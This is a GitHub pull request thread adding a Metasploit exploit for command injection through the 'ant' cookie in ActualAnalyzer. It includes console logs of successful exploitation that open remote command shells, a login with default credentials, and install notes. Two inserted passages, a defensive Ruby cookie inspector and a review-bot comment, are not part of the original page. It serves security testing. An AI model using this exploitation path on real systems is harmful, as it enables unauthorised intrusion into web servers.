Add actualanalyzer_ant_cookie_exec exploit #4328

Merged
merged 3 commits into from Dec 15, 2014


@bcoles
Contributor
bcoles commented Dec 6, 2014

This module exploits a command execution vulnerability in ActualAnalyzer version 2.81 and prior.

The 'aa.php' file allows unauthenticated users to execute arbitrary commands in the 'ant' cookie.

Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu 10.04.3 (PHP 5.3.2-1ubuntu4.17)

Output

msf exploit(actualanalyzer_ant_cookie_exec) > check
[+] 192.168.13.141:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > set verbose true
verbose => true
msf exploit(actualanalyzer_ant_cookie_exec) > check
[*] 192.168.13.141:80 - Found version: 2.81
[+] 192.168.13.141:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > set verbose true
verbose => true
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started reverse double handler
[+] 192.168.13.141:80 - Found analytics host: bt
[*] 192.168.13.141:80 - Sending payload (531 bytes)...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] 192.168.13.141:80 - Payload sent successfully
[*] Command: echo 2rAYCSKKNtZMdJ57;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n2rAYCSKKNtZMdJ57\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.13.132:4444 -> 192.168.13.141:52285) at 2014-12-06 13:43:52 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
^C
Abort session 1? [y/N]  y

[*] 192.168.13.141 - Command shell session 1 closed.  Reason: User exit

Source:

  • ActualAnalyzer Lite 2.81:
    hxxp://www.actualscripts.com/products/analyzer/downloads/editions/lite/file.php?file=lite281.zip
  • ActualAnalyzer Lite 2.75:
    hxxps://web.archive.org/web/20061114040847/http://www.actualscripts.com/products/analyzer/downloads/editions/lite/lite275.zip
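As an added defensive example (not part of this pull request or the module), a small Ruby inspector that flags requests to aa.php whose 'ant' cookie carries shell metacharacters or is oversized. The sample traffic, the path prefix, the 64-byte threshold and the assumption that a benign 'ant' value is a short token are all constructed here, not taken from the page.

```ruby
require 'cgi'

# Shell metacharacters that should never appear in an analytics cookie.
# Assumption (not from the page): a benign 'ant' value is a short plain token.
SHELL_META = /[;|&`$()<>\n\r\\'"]/

# Parse a raw Cookie header ("a=1; b=2") into a Hash of URL-decoded values.
def parse_cookie_header(header)
  header.to_s.split(/;\s*/).each_with_object({}) do |pair, h|
    name, value = pair.split('=', 2)
    next if name.nil? || name.strip.empty?
    h[name.strip] = CGI.unescape(value.to_s)
  end
end

# Inspect one request; returns nil when benign, else a String with the reason.
# Only aa.php consumes the 'ant' cookie, so other paths are ignored.
def inspect_request(method, path, cookie_header)
  return nil unless path =~ %r{(^|/)aa\.php(\?|$)}
  ant = parse_cookie_header(cookie_header)['ant']
  return nil if ant.nil?
  if ant =~ SHELL_META
    "#{method} shell metacharacter in 'ant' cookie: #{ant.inspect}"
  elsif ant.length > 64
    "#{method} oversized 'ant' cookie (#{ant.length} bytes)"
  end
end

# Constructed sample traffic: [method, path, Cookie header].
SAMPLE_REQUESTS = [
  ['GET', '/lite/aa.php',    'PHPSESSID=abc123; ant=bt'],
  ['GET', '/lite/aa.php',    'ant=bt%3Bid'],
  ['GET', '/lite/index.php', 'ant=bt%3Bid'],
  ['GET', '/lite/aa.php',    'ant=' + 'A' * 100],
  ['GET', '/lite/aa.php',    'lang=en'],
]

# Run the inspector over a list of requests and collect alert lines.
def scan(requests = SAMPLE_REQUESTS)
  requests.each_with_object([]) do |(m, p, c), alerts|
    reason = inspect_request(m, p, c)
    alerts << "#{p} -> #{reason}" if reason
  end
end

scan.each { |alert| puts alert } if __FILE__ == $0
```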
@wchen-r7 wchen-r7 added the module label Dec 6, 2014
@wvu-r7 wvu-r7 assigned wvu-r7 and unassigned wvu-r7 Dec 8, 2014
@jhart-r7 jhart-r7 self-assigned this Dec 12, 2014
@jhart-r7 jhart-r7 commented on an outdated diff Dec 12, 2014
...xploits/unix/webapp/actualanalyzer_ant_cookie_exec.rb
@@ -0,0 +1,242 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
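Review bot: the URL on the second `+` line of the header is malformed; `http//metasploit.com/download` lacks the colon after the scheme and should read `http://metasploit.com/download`, which is the form msftidy checks for in the standard module header.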
@jhart-r7
jhart-r7 Dec 12, 2014 Contributor

missing the :. msftidy now checks for this.

@jhart-r7
Contributor

This actually all looks fairly clean. The only big thing I'd like to see added, which I can do, is to mixin Scanner so it can be run at piles of hosts at once. I'll try to get a PR over to you tomorrow for review.

@wvu-r7
Contributor
wvu-r7 commented Dec 12, 2014

Thanks, @jhart-r7. Kinda engaged on other projects. The only thing I might change in this module is the use of case statements instead of complicated if statements.

@jhart-r7
Contributor

@bcoles , do you have any tips on how to get actualanalyzer running on Ubuntu? At least with 12.04, apache2 and php5, the install just 500s with no useful log entries after I enter the database information -- I suspect this version of php is too new/cool for it.

@jhart-r7 jhart-r7 referenced this pull request in bcoles/metasploit-framework Dec 12, 2014
Merged

Minor improvements to actual analyzer ant cookie exploit #1

@jhart-r7
Contributor

I seem to have gotten 2.81 running on Ubuntu 8.04. check marks it as vulnerable and exploit claims to succeed but the payloads I've tried all seem to generate errors server-side:

sh: Syntax error: word unexpected (expecting ")")
sh: Syntax error: Bad for loop variable
sh: Syntax error: Bad function name
sh: Syntax error: Bad function name
sh: Syntax error: Bad function name
sh: Syntax error: Bad for loop variable

I haven't really looked into what is causing this. @bcoles , any details you can share on your setup would help.

@bcoles
Contributor
bcoles commented Dec 14, 2014

@jhart-r7 I've tested with ActualAnalyzer versions 2.81 and 2.75 on:

  • Apache 2.2.14 (PHP 5.3.2-1ubuntu4.17) on Ubuntu 10.04.3
  • Apache 2.2.22 (PHP 5.4.4-14deb7u14) on Debian 7

Some install notes:

# dependencies
apt-get install apache2 mysql-server
apt-get install php5 php5-mysql php5-gd
service apache2 restart

# create db
mysql -h localhost -u root -p -e "create database analyzer;"

# get source
cd /var/www/
#wget source.zip && unzip source.zip
chmod 777 lite
@jhart-r7
Contributor

The Travis failure is almost certainly unrelated. I opened #4398 to track the failure but restarted Travis which should clear this up in ~30m.

@jhart-r7
Contributor

Ah, it looks like the issue for me on Ubuntu 8.04 was magic quotes, which was on by default back then but has since been removed.

@jhart-r7
Contributor

Looks good here. Landing. Validation:

Non-verbose, check and exploit against a vulnerable host:

msf exploit(actualanalyzer_ant_cookie_exec) > set VERBOSE false
VERBOSE => false
msf exploit(actualanalyzer_ant_cookie_exec) > check
[+] actualanalyzer-2-8-1-804.vuln:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started bind handler
[+] actualanalyzer-2-8-1-804.vuln:80 - Login successful! (admin:admin)
[+] actualanalyzer-2-8-1-804.vuln:80 - Payload sent successfully
[*] Command shell session 8 opened (172.16.10.138:42508 -> 10.4.29.4:4444) at 2014-12-15 09:15:02 -0800

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Verbose, check and exploit against a vulnerable host:

msf exploit(actualanalyzer_ant_cookie_exec) > check

[*] actualanalyzer-2-8-1-804.vuln:80 - Found version: 2.81
[+] actualanalyzer-2-8-1-804.vuln:80 - The target is vulnerable.
msf exploit(actualanalyzer_ant_cookie_exec) > run

[*] Started bind handler
[+] actualanalyzer-2-8-1-804.vuln:80 - Found analytics host: 10.4.29.4
[+] actualanalyzer-2-8-1-804.vuln:80 - Found analytics host: 10.4.29.4
[+] actualanalyzer-2-8-1-804.vuln:80 - Found analytics host: 10.4.29.4
[+] actualanalyzer-2-8-1-804.vuln:80 - Login successful! (admin:admin)
[*] actualanalyzer-2-8-1-804.vuln:80 - Trying hostname '10.4.29.4' - Sending payload (979 bytes)...
[+] actualanalyzer-2-8-1-804.vuln:80 - Payload sent successfully
[*] Command shell session 7 opened (172.16.10.138:54047 -> 10.4.29.4:4444) at 2014-12-15 09:14:43 -0800

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
@jhart-r7 jhart-r7 merged commit 4530066 into rapid7:master Dec 15, 2014

@jhart-r7 jhart-r7 added a commit that referenced this pull request Dec 15, 2014
@jhart-r7 jhart-r7 Land #4328, @bcoles' exploit for ActualAnalyzer < 2.81 'ant' code execution
effb5b9
@jhart-r7
Contributor

Landed. Thanks for the contribution, @bcoles. I made a few minor changes prior to landing -- see the final version (effb5b9).

@wvu-r7
Contributor
wvu-r7 commented Dec 15, 2014

And thanks for handling this, @jhart-r7. :)

@bcoles bcoles deleted the bcoles:actualanalyzer_ant_cookie_exec branch Dec 21, 2014
